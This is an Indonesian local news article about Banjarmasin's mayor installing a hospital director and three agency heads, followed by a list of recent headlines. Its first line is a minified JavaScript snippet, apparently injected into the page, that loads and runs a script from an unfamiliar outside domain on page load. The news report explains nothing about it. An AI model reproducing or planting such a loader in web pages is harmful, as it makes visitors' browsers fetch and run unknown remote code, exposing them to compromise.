(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Ibnu Sina Lantik Direktur RSUD Sultan Suriansyah dan Tiga Kepala Dinas


BANJARMASIN, Empat pejabat lingkup Pemko Banjarmasin mulai Senin (13/5), resmi menduduki jabatan baru. Mereka dilantik langsung oleh Walikota Banjarmasin H Ibnu Sina. Keempat pejabat tersebut terdiri dari tiga kepala dinas dan satu Direktur Rumah Sakit Umum Daerah (RSUD) Sultan Suriansyah Banjarmasin.

Mereka adalah Dr SukotjoHartono, Sp. THT-KL, yang sebelumnya menduduki jabatan sebagai dokter madya pada Dinas Kesehatan Kota Banjarmasin. Kini ia dipercaya menjabat sebagai Direktur Rumah Sakit Umum Daerah Sultan Suriansyah Kota Banjarmasin.

Kemudian Dr Machli Riyadi, AMK, S.H., M.H, sebelumnya ia menjabat sebagai Wakil Direktur Administrasi dan Hukum, Rumah Sakit Jiwa Sambang Lihum, Provinsi Kalimantan Selatan. Saat ini jabatan barunya adalah Kepala Dinas Kesehatan Kota Banjarmasin.

Muhammad Taufik Rivani, SH, M.Si, jabatan lama sebagai Kepala Dinas Pemuda dan Olahraga, Kabupaten Kotabaru, sedangkan jabatan barunya sebagai Kepala Dinas Kepemudaan dan Olahraga Kota Banjarmasin.

Serta Kepala Bagian Pemerintahan Sekretariat Daerah Kota Banjarmasin Iwan Ristianto, AP, M.AP, yang kini dipercaya memangku jabatan sebagai Kepala Dinas Sosial Kota Banjarmasin. “Hari ini yang dilantik Kadispora, Kadis Sosial, Kadis Kesehatan dan untuk pertama kalinya Direktur Rumah Sakit Sultan Suriansyah Banjarmasin, dan ini untuk mempercepat proses pengoperasian rumah sakit yang insyaallah akan kita jalankan 24 September 2019,” ujar H Ibnu Sina.

Selain telah mempersiapkan gedung dan melantik Direktur rumah sakit, katanya, langkah selanjutnya yang akan dilakukan Pemko Banjarmasinn terkait percepatan pengoperasian RSUD Sultan Suriansyah adalah menyiapkan tenaga medis dan non medis serta melengkapi peralatan medis.

“Untuk Direktur RSUD Sultan Suriansyah yang baru dilantik, saya minta agar pasien yang tidak mampu atau miskin harus tetap dilayani, walaupun tidak memiliki kartu BPJS. Siapa saja yang masuk IGD harus cepat dilayani dan ditangani dengan baik,” ucapnya.

Dijelaskannya, pelantikan tersebut merupakan bagian dari kebutuhan organisasi dalam rangka percepatan pembangunan dan kinerja birokrasi, serta merupakan bagian dari peningkatan kapasitas kelembagaan sebagai bagian dari upaya penyegaran, dan peningkatan kinerja ASN di lingkungan Pemko Banjarmasin.

“Pengisian jabatan ini harus dilakukan untuk mengisi kekosongan, serta memberikan perubahan dan tantangan, terutama bagi para pimpinan SKPD dan Direktur RSUD Sultan Suriansyah, untuk mencapai target yang telah direncanakan di tahun 2019 ini,” katanya.

Ia juga berpesan agar para pejabat yang baru dilantik senantiasa menjaga dan memperhatikan integritas, loyalitas, disiplin dan komitmen terhadap tugas dan tanggung jawab.

Kemudian menanamkan budaya kerja sebagai aparatur dengan maksud menjamin terselenggaranya tugas-tugas pemerintahan dan pelayanan kepada masyarakat dengan lebih cepat, tepat dan baik. Bersifat sensitif dan responsif terhadap tantangan dan permasalahan baru, yang timbul baik di dalam maupun diluar organisasi.

Serta mempunyai jiwa semangat untuk mewujudkan Good Governance dan menghindari terjadinya tindakan, yang tidak terpuji dan melanggar hukum dalam melaksanakan program kerja dan kegiatan.

Ditambahkannya lagi agar para pejabat yang dilantik ini mempunyai wawasan jauh ke depan dan mampu melakukan terobosan yang positif melalui pemikiran kreatif, inovatif dan sistemik, untuk kepentingan organisasi. Serta mempunyai kemampuan mengkombinasikan berbagai sumber dan memanfaatkan sumber daya secara optimal, sehingga dapat menghasilkan produktivitas kerja secara maksimal.

“Memasuki empat tahun masa kepemimpinan kami berdua, kembali kami berharap kepada seluruh kepala SKPD dan Direktur RSUD Sultan Suriansyah untuk terus mendukung dan mengawal visi Kota Banjarmasin, yakni Banjarmasin Baiman,” pungkasnya.(mario)

Reporter:Mario
Editor:Cell

Desy Arfianty

Recent Posts

DPRD Banjarbaru Target Tiga Raperda Inisiatif Selesai Dalam Tiga Bulan

KANALKALIMANTAN.COM, BANJARBARU - Tiga buah Rancangan Peraturan Daerah (Raperda) inisiatif ditargetkan selesai dalam waktu tiga… Read More

7 menit ago

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

4 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

7 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

7 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

7 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

7 jam ago

This website uses cookies.